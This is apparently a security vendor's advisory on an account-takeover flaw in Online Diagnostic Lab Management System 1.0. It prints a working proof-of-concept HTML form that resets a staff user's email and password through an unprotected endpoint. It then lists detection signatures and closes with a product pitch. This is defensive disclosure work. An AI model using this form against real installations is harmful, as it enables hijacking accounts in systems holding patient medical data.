Online Diagnostic Lab Management System 1.0 - Account Takeover



Application Details

Online Diagnostic Lab Management System is a web-based application that serves as an online platform for diagnostic labs to manage their patient laboratory tests. The system also allows patients to book an appointment. The medical testing labs can use the system to manage all appointments, and patient test results.


Vulnerability

Online Diagnostic Lab Management System could allow a remote attacker to bypass security restrictions, caused by improper access control.


Identification

By sending a specially crafted request using the 'id', 'email', 'password' and 'cpass' parameters, an attacker could exploit this vulnerability to takeover any registered staff user account.


<html>
<body>
<form action="http://localhost/odlms/classes/Users.php?f=save_client" method="post" enctype="multipart/form-data">
<input type="hidden" name="id" value="2" />
<input type="hidden" name="firstname" value="Claire" />
<input type="hidden" name="middlename" value="C" />
<input type="hidden" name="lastname" value="Blake" />
<input type="hidden" name="gender" value="Female" />
<input type="hidden" name="dob" value="1997-10-14" />
<input type="hidden" name="contact" value="09456789123" />
<input type="hidden" name="address" value="Sample Address only" />
<input type="hidden" name="email" value="test@test.com" />
<input type="hidden" name="password" value="test@1234" />
<input type="hidden" name="cpass" value="test@1234" />
<input value="Submit" type="Submit">
</form>
</body>
</html>

Detection

By turning this into a traffic file and matching rule, we are able to detect attempts to bypass security restrictions by influencing the vulnerable parameters.


Coverage

Idappcom has created signatures 8022351 and 8022352 along with corresponding traffic files.


References

ODLMS 1.0 - Account Takeover - Exploit Database

ODLMS 1.0 Missing Access Control - Packet Storm Security


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional